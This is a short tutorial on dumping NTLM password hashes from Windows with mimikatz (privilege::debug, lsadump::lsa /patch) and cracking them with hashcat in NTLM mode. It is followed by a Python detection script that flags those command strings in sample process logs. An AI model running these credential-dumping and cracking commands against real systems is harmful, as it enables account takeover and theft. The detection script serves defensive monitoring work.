Dumping Hashes with mimikatz

Introduction

Mimikatz is a very popular and powerful post-exploitation tool, mainly used for dumping user credentials inside an Active Directory network.

We'll be focusing on dumping the NTLM hashes with mimikatz and then cracking those hashes using hashcat.


Dump Hashes w/ mimikatz

  1. cd Downloads && mimikatz.exe - This changes into the directory where mimikatz is kept and runs the mimikatz binary.

  2. privilege::debug - Ensure that the output is "Privilege '20' OK". This confirms that you're running mimikatz as an administrator; if you don't run mimikatz as an administrator, it will not run properly.

  3. lsadump::lsa /patch - Dump those hashes!


Crack those hashes w/ hashcat

  1. hashcat -m 1000 <hash> rockyou.txt
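
From the defender's side, the commands in both procedures above leave recognizable strings in process-creation logs. The Python below is an added example, not part of the original page: it flags those strings in constructed events, and the event fields host, image and cmdline are an assumed, hypothetical schema.

```python
import ntpath
import re
import shlex

# Strings taken from the steps on this page; matching is case-insensitive.
MIMIKATZ_CMDS = re.compile(r"\b(privilege::debug|lsadump::lsa)\b", re.I)

def tokens(cmdline):
    """Split a Windows command line, tolerating unbalanced quotes."""
    try:
        parts = shlex.split(cmdline, posix=False)
    except ValueError:
        parts = cmdline.split()
    return [p.strip('"') for p in parts]

def hashcat_mode(args):
    """Return the mode from -m N, -mN, --hash-type N or --hash-type=N."""
    for i, arg in enumerate(args):
        if arg in ("-m", "--hash-type") and i + 1 < len(args):
            return args[i + 1]
        if arg.startswith("--hash-type="):
            return arg.split("=", 1)[1]
        if re.fullmatch(r"-m\d+", arg):
            return arg[2:]
    return None

def classify(event):
    """Return the names of the rules one process-creation event matches."""
    image = ntpath.basename(event["image"]).lower()
    hits = ["mimikatz_image"] if image == "mimikatz.exe" else []
    # Only fires when commands are passed as arguments, not typed in the console.
    hits += dict.fromkeys("mimikatz_cmd:" + c.lower() for c in MIMIKATZ_CMDS.findall(event["cmdline"]))
    if image.startswith("hashcat") and hashcat_mode(tokens(event["cmdline"])) == "1000":
        hits.append("hashcat_ntlm_mode")  # -m 1000 is hashcat's NTLM mode
    return hits

def scan(events):
    return [(e["host"], h) for e in events if (h := classify(e))]

# Constructed sample events (not real telemetry; hypothetical schema).
EVENTS = [
    {"host": "DC01", "image": r"C:\Users\adm\Downloads\mimikatz.exe", "cmdline": "mimikatz.exe"},
    {"host": "DC01", "image": r"C:\Users\adm\Downloads\mimikatz.exe", "cmdline": 'mimikatz.exe "privilege::debug" "lsadump::lsa /patch"'},
    {"host": "WS07", "image": r"C:\Tools\hashcat.exe", "cmdline": "hashcat.exe -m 1000 ntlm.txt rockyou.txt"},
    {"host": "WS07", "image": r"C:\Tools\hashcat.exe", "cmdline": "hashcat.exe --hash-type=0 md5.txt rockyou.txt"},
]

if __name__ == "__main__":
    print(scan(EVENTS))
```

When mimikatz is started interactively as in step 1, only the image-name rule fires, because commands typed into its console are not recorded on the process command line.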
